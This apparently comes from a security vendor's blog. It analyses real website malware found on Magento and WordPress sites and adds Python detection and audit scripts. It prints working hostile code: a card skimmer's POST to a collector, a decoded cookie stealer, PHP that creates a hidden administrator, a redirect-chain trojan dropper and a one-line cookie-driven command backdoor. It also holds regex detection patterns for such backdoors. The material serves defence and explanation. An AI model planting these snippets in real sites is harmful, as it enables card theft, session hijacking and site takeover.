Client-Side or Server-Side Script?

We’ve already described several times how credit card stealing malware hides a data collecting script behind an image URL. When people see URLs that end with .jpg, .png, or .gif they normally don’t expect them to do anything malicious. Third-party JavaScript files are much more suspicious, but it is still possible to use them in a way that coaxes webmasters into considering them benign.

When checking yet another credit card stealing JavaScript injected into the /js/ccard.js file in Magento, we noticed this line:

e294b002686cad2df01bb59e3e2299f3e:'hxxps://informaer[.]net/js/info_jquery.js',

A JS script referenced from a malicious injection is always suspicious to us, especially when it has the word jquery in it and points to an unknown domain (with a typo). When we opened that URL, the only content we found there was:

jQuery.noConflict();

jQuery.noConflict() tells the jQuery library to restore the original value of “$”, which lets you use other JS libraries that use “$” as a function or variable name alongside jQuery. The code is definitely benign.

But let’s check how this "informaer" URL is used by the script.

...
var http = new XMLHttpRequest();
http.open('POST', be20b6410993ea4c7a48767775856514b.e294b002686cad2df01bb59e3e2299f3e, true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.send('info=' + keym + '&hostname=' + domm + '&key=' + be20b6410993ea4c7a48767775856514b.myid);

It turns out that the URL is actually not a static JavaScript file. It’s a server-side script that receives data from filled-out checkout forms, passed in the info parameter of a POST request. It’s actually the collector of the stolen data. However, if you don’t use the POST method or don’t pass the correct parameters, it pretends to be a benign JavaScript file. It even sets the Content-Type: application/javascript; charset=utf-8 header to make it look plausible.

Hackers may go the extra mile to make their resources look benign, but as a webmaster you should never rely on what code looks like. Instead, verify whether it belongs to your site by answering two questions: 1. Did I put it there? If not, then 2. Is this code part of the third-party software I installed? To answer the second question, compare it to the original third-party software (get it either directly from the developer or from your clean backup copy). If the answer to both questions is NO, then no matter how benign the code looks, it was most likely placed there as a result of a site compromise. Integrity control can help you easily identify such unauthorized code injections.
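The two questions above boil down to a file integrity check against a known-good copy. The Python script below is an added example (not code from the original post or from Sucuri): it hashes a clean reference tree (vendor package or backup) and the live tree, reports modified, added and missing files, and lists the external hosts referenced by anything that changed, which is what tells you where an injected script sends its data. The file contents, paths and hostnames (collector.invalid, shop.example) are constructed for the demonstration.

```python
import hashlib
import re

# Constructed sample "trees": path -> file bytes. In practice these come from
# walking the vendor package / clean backup and the live document root.
CLEAN_TREE = {
    "js/ccard.js": b"function validateCard(n){return /^\\d{13,19}$/.test(n);}\n",
    "js/jquery.min.js": b"/* jquery stub */\n",
    "index.php": b"<?php require 'app/bootstrap.php';\n",
}

LIVE_TREE = {
    # same file with a skimmer-style POST appended (constructed; placeholder host)
    "js/ccard.js": CLEAN_TREE["js/ccard.js"]
    + b"var http=new XMLHttpRequest();"
      b"http.open('POST','https://collector.invalid/js/info_jquery.js',true);"
      b"http.send('info='+keym);\n",
    "js/jquery.min.js": CLEAN_TREE["js/jquery.min.js"],
    "index.php": CLEAN_TREE["index.php"],
    # a file that exists in neither the vendor package nor the backup
    "media/loader.php": b"<?php /* not in vendor package */\n",
}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def fingerprint(tree):
    """Map each path to the SHA-256 of its content."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in tree.items()}


def external_hosts(data, own_hosts):
    """Hosts referenced by URLs in a file, minus the ones that belong to the site."""
    hosts = sorted({h.lower() for h in URL_RE.findall(data.decode("utf-8", "replace"))})
    return [h for h in hosts if h not in own_hosts]


def integrity_report(clean, live, own_hosts=()):
    """Answer the two questions: is the file an unchanged vendor/backup copy?
    If not, what changed and which external hosts does it talk to?"""
    clean_fp, live_fp = fingerprint(clean), fingerprint(live)
    report = {"modified": {}, "added": {}, "missing": sorted(set(clean) - set(live))}
    for path, digest in live_fp.items():
        if path not in clean_fp:
            report["added"][path] = external_hosts(live[path], own_hosts)
        elif digest != clean_fp[path]:
            report["modified"][path] = external_hosts(live[path], own_hosts)
    return report


if __name__ == "__main__":
    for kind, entries in integrity_report(CLEAN_TREE, LIVE_TREE, {"shop.example"}).items():
        print(kind, entries)
```

Run it for real by replacing the two dictionaries with a walk of the vendor package and the document root; a file that is modified or added and talks to a host you do not recognize is exactly the case described in this post, whether the URL ends in .js or .jpg.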

If malware detection and removal still sound too complex for you, Sucuri is here to help.

WordPrssAPI Steals Your Cookies

Cookies are an important part of a visitor’s session on a website. They are used not only to keep track of the actions a particular user takes on a site, but also to maintain login sessions. Having those cookies stolen can easily lead to a compromise of any admin area you visit and lets the attacker know what you did on that site.

These types of attack (Cookie Stealing and Session Hijacking) are not the most common ones, due to the complexity involved in the process and because they are usually time sensitive (cookies expire).

During an incident response investigation, we found cookie-stealing malware pretending to communicate with one of WordPress’s official domains. The hackers injected obfuscated JavaScript (the typical eval(function(p,a,c,k,e,d) packer) at the bottom of legitimate .js files such as wp-includes/js/hoverIntent.min.js. Once decoded, we see the following:

function adsadsgg() {
  var gd = document.cookie.indexOf("_utmzz=");
  if (gd == -1 && (/Applebot|baiduspider|Bingbot|Googlebot|ia_archiver|msnbot|Naverbot|seznambot|Slurp|teoma|Yandex|Yeti/i.test(navigator.userAgent) == false)) {
    var rd = Math.floor(Math.random() * 2);
    if (rd == 0) {
      var sss = document.createElement('script');
      sss.src = "hxxps://code.wordprssapi[.]com/ajax/json.aspx?c=" + escape(document.cookie);
      document.body.appendChild(sss)
    }
    var dd = new Date();
    dd.setTime(dd.getTime() + 86400000);
    window.document.cookie = "_utmzz=ga; expires=" + dd.toGMTString()
  }
}
if (typeof(jQuery) != 'undefined') {
  jQuery(function() {
    adsadsgg()
  })
} else {
  window.onload = function() {
    adsadsgg()
  }
}

In the snippet above, we can see that the stolen cookie data is being sent to the fake domain code.wordprssapi[.]com (see the typo?), which is a way to trick people into thinking that it sends the data to an official WordPress domain, which it is not. By the way, code.wordprEssapi.com also has nothing to do with the real WordPress. Actually, even if it were an official WordPress domain, sending your cookies to it would be a big red flag! Cookies are private information that should not be shared with any third parties. Like passwords.
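To inspect an injection like this one without executing it, you have to undo the p,a,c,k,e,d packer first and then look at where document.cookie ends up. The Python script below is an added example, not code from the original post or from Sucuri: it parses the packer wrapper, rebuilds the packer’s token table the same way the wrapper’s e() function does, decodes the payload, and then reports any host that appears in the same statement as document.cookie. The packed sample is constructed for this demonstration (its decoded form is a small script-tag injector pointing at the placeholder host example.invalid).

```python
import re

ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz"


def packer_symbol(index, base):
    """Reproduce the packer's e() function: word index -> token used in the packed source.
    Digits above 35 become 'A'..'Z' (char code + 29), exactly as the JS does."""
    prefix = "" if index < base else packer_symbol(index // base, base)
    digit = index % base
    return prefix + (chr(digit + 29) if digit > 35 else ALPHABET[digit])


# Matches the tail of the wrapper: }('<payload>',base,count,'<words>'.split('|')
PACKED_RE = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)"
)


def js_unescape(s):
    """Undo the backslash escapes the packer uses inside its single-quoted payload."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "r": "\r", "t": "\t"}.get(m.group(1), m.group(1)), s)


def unpack(source):
    """Return the decoded script, or None if the source is not p,a,c,k,e,d-packed."""
    m = PACKED_RE.search(source)
    if not m:
        return None
    payload, base, count, words = m.groups()
    base, count = int(base), int(count)
    words = words.split("|")
    # Same table the wrapper builds: d[e(c)] = k[c] || e(c)
    table = {}
    for i in range(count):
        sym = packer_symbol(i, base)
        table[sym] = words[i] if i < len(words) and words[i] else sym
    # Same final step as the wrapper: replace every \b\w+\b via the table
    return re.sub(r"\b\w+\b", lambda t: table.get(t.group(0), t.group(0)),
                  js_unescape(payload), flags=re.ASCII)


def cookie_exfil_hosts(js):
    """Hosts named in any statement that also reads document.cookie."""
    hosts = set()
    for stmt in js.split(";"):
        if "document.cookie" in stmt:
            hosts.update(h.lower() for h in re.findall(r"https?://([A-Za-z0-9.-]+)", stmt))
    return sorted(hosts)


# Constructed packed sample (standard wrapper, hand-packed payload, placeholder host)
PACKED_SAMPLE = (
    r"""eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))"""
    r"""+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};"""
    r"""if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];"""
    r"""e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}"""
    r"""return p}('0 1=2.3(\'4\');1.5="6://7.8/9?a="+b(2.c);2.d.e(1)',62,15,"""
    r"""'var|s|document|createElement|script|src|https|example|invalid|x|c|escape|cookie|body|appendChild'"""
    r""".split('|'),0,{}))"""
)

if __name__ == "__main__":
    decoded = unpack(PACKED_SAMPLE)
    print(decoded)
    print("cookie sent to:", cookie_exfil_hosts(decoded))
```

The decoder mirrors the wrapper’s own “fast” branch (one pass over \w+ tokens with a lookup table), so it produces what the browser would have evaluated; feeding the result to cookie_exfil_hosts gives you the exfiltration host to block and to search your logs for.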

The attackers also went the extra mile to ensure that they do not receive any cookie information from crawlers and bots such as Googlebot, so that they only receive data that can be used immediately.

As the malicious code was injected into a WordPress core file, a quick integrity check would alert the user to the issue. For more detailed instructions on how to clean a hacked WordPress site, check our step-by-step guide.

Titles, Imprints and Marks Left by Attackers

Some attackers seem to like signing their scripts. This is especially true for defacements and backdoors, where attackers show their pride by stating that they “owned” a site and signing their own malware. Sometimes they write their expressions and nicknames in the title or in the middle of the file:

<title>Ow3nd </title><center><div id=q>Your Site Has Been Ow3nd By ...

Or like in this malware sample:

<title>#Pwned</title><p> ... </p><h3> ... ownz you</h3> ...

Or even the classic one:

<title>Hacked by …

We have seen thousands of defacement title variations (and even more backdoor patterns), and still we find new variations every day.

By looking at a file's title, we may be able to tell whether it is malware. Most of the time, though, finding malware requires much deeper scanning, decryption and deobfuscation, which makes the task difficult and time consuming. If you don’t use such scanning and want to make sure you didn’t miss any defacements or backdoors on your server, you can have us scan your site for thousands of different malware patterns.

WebSockets, Viagra and Fake CloudFlare CDN

Recently we’ve seen some WordPress websites displaying unwanted banners at the bottom of the page, appearing 15 seconds after the page is opened. Those banners are generated by the following code injected into the theme’s functions.php file:

function add_js_scripts() {
    wp_enqueue_script('js-rws', 'hXXp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1[.]0[.]0/reconnecting-websocket[.]js', '', null, true);
    wp_enqueue_script('js-cors', 'hXXp://cloudflare[.]solutions/ajax/libs/cors/cors[.]js', '', null, true);
}

add_action( 'wp_enqueue_scripts', 'add_js_scripts' );
add_action('admin_enqueue_scripts', 'add_js_scripts' );
add_action('login_enqueue_scripts', 'add_js_scripts' );

The code above uses WordPress core functions like wp_enqueue_script and add_action to inject external scripts into all WordPress pages (including the admin and login pages).
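One way to catch this kind of injection before visitors do is to audit every wp_enqueue_script call in theme and plugin PHP for an external host you did not approve, and to note which hooks fire it (the admin and login hooks are the giveaway here). The Python script below is an added example, not code from the original post or from WordPress; the functions.php fragment and the host cdn-lookalike.invalid are constructed for the demonstration.

```python
import re
from urllib.parse import urlparse

# Constructed functions.php: one legitimate, theme-relative enqueue plus an
# injected function in the shape shown above (placeholder host).
SAMPLE_FUNCTIONS_PHP = """<?php
function theme_assets() {
    wp_enqueue_script('theme-main', get_template_directory_uri() . '/js/main.js', array('jquery'), '1.0', true);
}
add_action('wp_enqueue_scripts', 'theme_assets');

function add_js_scripts() {
    wp_enqueue_script('js-rws', 'http://cdn-lookalike.invalid/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js', '', null, true);
    wp_enqueue_script('js-cors', 'http://cdn-lookalike.invalid/ajax/libs/cors/cors.js', '', null, true);
}
add_action( 'wp_enqueue_scripts', 'add_js_scripts' );
add_action('admin_enqueue_scripts', 'add_js_scripts' );
add_action('login_enqueue_scripts', 'add_js_scripts' );
"""

# handle and src of enqueues whose src is a literal absolute URL
ENQUEUE_RE = re.compile(
    r"""wp_enqueue_(?:script|style)\(\s*['"]([^'"]+)['"]\s*,\s*['"](https?://[^'"]+)['"]"""
)
# which enqueue hooks each callback is attached to
HOOK_RE = re.compile(
    r"""add_action\(\s*['"]((?:wp|admin|login)_enqueue_scripts)['"]\s*,\s*['"]([A-Za-z0-9_]+)['"]"""
)
# top-level function definitions; enqueues outside a function are not tied to hooks here
FUNC_RE = re.compile(r"function\s+([A-Za-z0-9_]+)\s*\([^)]*\)\s*\{(.*?)\n\}", re.S)


def find_external_enqueues(php, allowed_hosts):
    """Return (handle, host, hooks) for every script enqueued from a host you did not approve."""
    hooks_by_callback = {}
    for hook, callback in HOOK_RE.findall(php):
        hooks_by_callback.setdefault(callback, []).append(hook)
    findings = []
    for name, body in FUNC_RE.findall(php):
        for handle, url in ENQUEUE_RE.findall(body):
            host = urlparse(url).hostname.lower()
            if host not in allowed_hosts:
                findings.append((handle, host, sorted(hooks_by_callback.get(name, []))))
    return findings


if __name__ == "__main__":
    for handle, host, hooks in find_external_enqueues(SAMPLE_FUNCTIONS_PHP, {"cdnjs.cloudflare.com"}):
        print(f"{handle}: loads from {host}, fired by {', '.join(hooks)}")
```

Relative and theme-local sources (get_template_directory_uri() and friends) are deliberately ignored, so the report only contains absolute URLs to hosts outside your allowlist; a script that is also wired to admin_enqueue_scripts and login_enqueue_scripts deserves the closest look.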

The third-party scripts load from what looks like a CloudFlare CDN. And if you open the cloudflare[.]solutions site, you’ll see it says "This Server is part of Cloudflare Distribution Network." However, WHOIS says that the domain was registered only on February 11, 2017 to a Russian company, Legato LLC, and it is now hosted in Ukraine on a server with the IP 78.109.28.70.

The first injected script, reconnecting-websocket.js, is a copy of the legitimate ReconnectingWebSocket library. It’s not malicious. But the second injected script, cors.js, is more interesting. After decoding it, you may notice that it has a list of banner images hosted on the imgur.com image hosting service.

var banners=[];
var bannercount=0;
var bannersSrc=["hXXPs://i.imgur[.]com/gXcct1z[.]jpg","hXXPs://i.imgur[.]com/FAdidSx.jpg","hXXPs://i.imgur[.]com/fGOvfDF.jpg","hXXPs://i.imgur[.]com/MjWLkNB.jpg","hXXPs://i.imgur[.]com/3On9O6O.jpg","hXXPs://i.imgur[.]com/cdBEiDU.jpg","hXXPs://i.imgur[.]com/xyKxCFG.jpg","hXXPs://i.imgur[.]com/BRSxZ96.jpg","hXXPs://i.imgur[.]com/NfyV72o.jpg","hXXPs://i.imgur[.]com/fcHTBav.jpg","hXXPs://i.imgur[.]com/5SsJqTM.jpg"];
var mobileBanners=["hXXPs://i.imgur[.]com/KRqvxk4.jpg","hXXPs://i.imgur[.]com/84mQCt4.jpg","hXXPs://i.imgur[.]com/hyblTs8[.]jpg","hXXPs://i.imgur[.]com/85tjX88.jpg"];

The script downloads the images, waits 15 seconds and then loads them as banners that lead to www[.]orderrealviagra[.]cc, rotating the images on every new page load. If a user clicks on a banner or closes it (the banners have a close [x] button), the script sets the adwords-cookie-settings cookie for the next 7 days and won’t show the banners to browsers that have this cookie.

An interesting and quite rare feature of this script is that it uses the WebSocket protocol (that’s why they also inject the reconnecting-websocket.js library) instead of HTTP to communicate with its server, wss://cloudflare[.]solutions:8085, using a custom set of commands:

socket.send("cb*" + navigator.userAgent)
socket.send("rts*" + navigator.userAgent)
socket.send("rsbl*" + navigator.userAgent)
socket.send("msbl*" + navigator.userAgent)

Using new generic TLDs like .solutions is still quite uncommon, but not on this server: a reverse IP lookup revealed only one other site on it (ardf[.]world), which also happens to use a new generic TLD (.world). Do these sites have the same owner, or is it just a coincidence?

This case proves that malware may hide behind legit-looking URLs, and you should carefully review all third-party resources that your site loads. Don’t forget that theme files are a very popular target for malware injections (the most popular for attacks that use stolen or brute-forced WordPress credentials), and you should monitor their integrity. Unauthorized changes are a strong indicator of a hack.

If you see your site showing unwanted banners or popups but can’t locate their source, you might want to have us scan your site for malware and clean it.

Attackers Silently add new user with Administrator role...

Attackers keep getting smarter in order to avoid detection and gain access to your WordPress site. They use legitimate functions of the WordPress core to create users, post spammy content, and perform other kinds of malicious activity.

In most cases where legitimate functions are used, attackers avoid combining them with obfuscation techniques, to reduce the chances of being detected by antivirus solutions and regular scanners.

One case that we recently researched was just like that. The attacker placed a PHP script inside the root directory of the WordPress installation and included the wp-load.php file, which gave them access to the core functions.

$wp_load_loc = "wp-load.php";
require_once($wp_load_loc);

After loading the file, it is easy to create a WordPress user and set the role to administrator via the core functions.

$user_id = wp_create_user('username987', 'password987');
$user = new WP_User($user_id);
$user->set_role('administrator');

Having the administrator role gives attackers unlimited possibilities to harm your site and business. They can lock you out of the backend, and if you aren’t logging in very often or performing any security checks, these bogus ‘Administrator’ users could go undetected for a long time.
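An audit that compares the users who actually hold the administrator role with the list you expect is a cheap way to surface these accounts. The Python script below is an added example, not code from the original post or from WordPress: it parses the PHP-serialized wp_capabilities value stored in wp_usermeta and flags administrators who are not on your roster or were created recently. The rows are constructed; the wp_ table prefix and the SQL in the comment are assumptions you would adapt to your own installation.

```python
import re
from datetime import datetime, timedelta

# Constructed rows, shaped like the result of (assumed table prefix "wp_"):
#   SELECT u.ID, u.user_login, u.user_registered, m.meta_value
#     FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID
#    WHERE m.meta_key = 'wp_capabilities';
SAMPLE_ROWS = [
    (1, "owner", "2016-03-02 10:15:00", 'a:1:{s:13:"administrator";b:1;}'),
    (2, "editor1", "2016-05-20 08:00:00", 'a:1:{s:6:"editor";b:1;}'),
    (7, "username987", "2017-02-14 03:12:44", 'a:1:{s:13:"administrator";b:1;}'),
    (8, "sub", "2017-02-01 12:00:00", 'a:1:{s:10:"subscriber";b:1;}'),
]

# One entry of the serialized PHP array: s:<len>:"<role>";b:<0|1>;
CAP_RE = re.compile(r's:\d+:"([^"]+)";b:([01]);')


def roles_from_capabilities(serialized):
    """Parse a PHP-serialized wp_capabilities array into the set of enabled roles."""
    return {role for role, enabled in CAP_RE.findall(serialized) if enabled == "1"}


def unexpected_admins(rows, known_admins, now, recent_days=30):
    """Administrators that are not on the roster, or were created within recent_days."""
    findings = []
    for user_id, login, registered, caps in rows:
        if "administrator" not in roles_from_capabilities(caps):
            continue
        created = datetime.strptime(registered, "%Y-%m-%d %H:%M:%S")
        reasons = []
        if login not in known_admins:
            reasons.append("not in admin roster")
        if now - created <= timedelta(days=recent_days):
            reasons.append("created in last %d days" % recent_days)
        if reasons:
            findings.append((user_id, login, reasons))
    return findings


if __name__ == "__main__":
    for user_id, login, reasons in unexpected_admins(SAMPLE_ROWS, {"owner"}, datetime(2017, 2, 20)):
        print(f"user {user_id} ({login}): {'; '.join(reasons)}")
```

Schedule this against a read-only database user and diff the output over time; an administrator that appears without a matching change-management entry is the bogus account the note describes, and the registration timestamp narrows down when the site was entered.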

If you’ve noticed any suspicious activity, or your website recently got blacklisted, this could be an indication that something may be wrong. We highly recommend contacting a professional to investigate the issues for you.

doc.google.com.TROJAN

During an incident response process, we identified some files located in a website’s root folder. Although they had different filenames (post.php, news.php, home.php, etc.), they had the same malicious content:

<?php
$dom = array('www[.]edgefinance[.]co[.]za','www[.]capitalregioncog[.]org','contas[.]cnt[.]br','boletim[.]contas[.]cnt[.]br','www[.]capitolregionwd[.]org','bolivarcarrillo[.]udem[.]edu[.]ni','foodscience[.]keio[.]ac[.]jp','www[.]keprate[.]com','rosaliarios[.]udem[.]edu[.]ni','www[.]armd-france[.]org','luispalacios[.]udem[.]edu[.]ni','www[.]kepak[.]com','candramustika[.]unja[.]ac[.]id','appserver[.]guabiruba[.]sc[.]gov[.]br','luiscanales[.]udem[.]edu[.]ni','rawahil[.]com','avai[.]com[.]br','boletin[.]ucv[.]edu[.]pe','preview[.]table59[.]co[.]uk','jorgemendoza[.]udem[.]edu[.]ni','apps[.]timeslive[.]co[.]za','www[.]uaec[.]ufcg[.]edu[.]br','jornadasmediterraneas2014[.]atlantacongress[.]org','www[.]inmune[.]cl','www[.]dees-groep[.]nl','sporternaehrung[.]global-nutrition[.]de','www[.]afonsolopes[.]com','geomorfo[.]criba[.]edu[.]ar','wordpress[.]hockeyreno[.]com','ideation[.]attero[.]in');

$url = 'hXXp://'.$dom[mt_rand(0,sizeof($dom)-1)].'/file.php';
if (strlen($_SERVER["QUERY_STRING"])>1) {
    $file=@file_get_contents($url.'?aaaa');
    header ("Content-Type: image/jpeg");
    echo $file;
} else {
    header('Location: '.$url);
}
exit;
?>

This kind of malicious code is very familiar to us. It is part of a campaign in which different sites are used as a redirect chain leading to the spam or malware page. The technique is an evasion method that lets the attacker keep a fresh (not yet blacklisted) site at the end of the chain.

The code, when accessed, checks whether $_SERVER["QUERY_STRING"] is longer than one character. If a parameter is passed, it fetches content from file.php on one of the listed sites and serves it as an image; if no parameter is passed, it redirects the browser to that site, which proceeds to the download of a doc.google.com file, a trojan meant to be executed on Windows machines. You can find more information about that trojan file here.

If you are experiencing such redirects, this could be the reason. We highly recommend checking your site with our free scanner SiteCheck, and if you need any help identifying and cleaning it up, let us know.

Set your Cookie, Execute a Command

Backdoors evolve. They tend to get more complex, harder to understand and harder to decode, but this is not always the case.

Most backdoors rely on PHP engine options that allow the execution of commands, and those same options are also depended on by core functionality in most of the CMSs out there.

The case today was different. The backdoor was so tiny that, if you overlook some of the file names on your website, you can easily miss it.

<?php if (isset($_COOKIE["i5o8vz"])) @$_COOKIE["cmd"]($_COOKIE["i5o8vz"]);

It is a really simple yet powerful backdoor. The attacker who placed it on your website sets a cookie so they can execute the command carried in the cookie’s payload, and, as we know, setting a cookie is a piece of cake. Also, $_COOKIE and $_POST variables are used as a “cloaking method”, since they are not logged by default in access logs, unlike $_GET, which makes it harder to detect anomalies when inspecting logs.
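Tiny backdoors like this one, the redirect-chain script from the doc.google.com.TROJAN note above, and the signed defacements from the Titles, Imprints and Marks note all have a recognizable shape in source, even when the file name does not. The Python script below is an added example (not code from the original post or from Sucuri) of a small rule-based scanner for those shapes; the sample files are constructed, reusing the shape of the code shown on this page with placeholder hosts.

```python
import re

# Each rule: (name, pattern, why it matters). Patterns follow the shapes shown in
# the three notes; like any signature they can false-positive (a legitimate page
# titled "How I got hacked" trips the last one), so treat hits as leads to review.
RULES = [
    ("superglobal-callable",
     re.compile(r"@?\$_(?:COOKIE|POST|GET|REQUEST)\[[^\]]+\]\s*\("),
     "a value taken from the request is called as a function"),
    ("superglobal-eval",
     re.compile(r"\beval\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:COOKIE|POST|GET|REQUEST)\["),
     "request data is evaluated as PHP code"),
    ("remote-redirect-chain",
     re.compile(r"header\s*\(\s*['\"]Location:\s*['\"]\s*\.\s*\$\w+", re.I),
     "redirect target is built from a variable (often a randomly chosen remote host)"),
    ("remote-fetch-as-image",
     re.compile(r"file_get_contents\s*\(\s*\$\w+.*?header\s*\(\s*['\"]Content-Type:\s*image/", re.S | re.I),
     "remote content is fetched and served as an image"),
    ("defacement-title",
     re.compile(r"<title>[^<]*\b(?:hacked|pwned|(?:ow|0w)[3e]?n(?:[e3]?d|z)|defaced)\b", re.I),
     "page title matches common defacement signatures"),
]


def scan(source):
    """Return (rule name, explanation) for every rule that matches the file content."""
    return [(name, why) for name, pattern, why in RULES if pattern.search(source)]


# Constructed sample files: the cookie backdoor from this note, a redirect-chain
# script in the shape of the doc.google.com.TROJAN note (placeholder hosts), a
# defacement page, and two benign files that must stay clean.
SAMPLES = {
    "cookie-backdoor.php": '<?php if (isset($_COOKIE["i5o8vz"])) @$_COOKIE["cmd"]($_COOKIE["i5o8vz"]);',
    "post.php": """<?php
$dom = array('hop-one.invalid','hop-two.invalid');
$url = 'http://'.$dom[mt_rand(0,sizeof($dom)-1)].'/file.php';
if (strlen($_SERVER["QUERY_STRING"])>1) {$file=@file_get_contents($url.'?aaaa');header("Content-Type: image/jpeg");echo $file;} else {header('Location: '.$url);}
exit;""",
    "index.html": "<html><head><title>Ow3nd </title></head><body><center><div id=q>Your Site Has Been Ow3nd By ...</div></center></body></html>",
    "wp-config-sample.php": "<?php define('DB_NAME', 'database_name_here');",
    "contact.php": "<?php $name = htmlspecialchars($_POST['name']); echo \"Hello $name\";",
}

if __name__ == "__main__":
    for path, content in SAMPLES.items():
        for name, why in scan(content):
            print(f"{path}: {name} ({why})")
```

Point scan() at every file under the document root, not only .php files; the defacement rule is there precisely because the marks often sit in HTML, and the first two rules are what make the one-line cookie backdoor visible regardless of the name it was saved under.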

If you notice some suspicious activity on your website, or it is sending SPAM on its own, or even if you have been blacklisted by the major search engines, you can rely on us to clean and protect your website.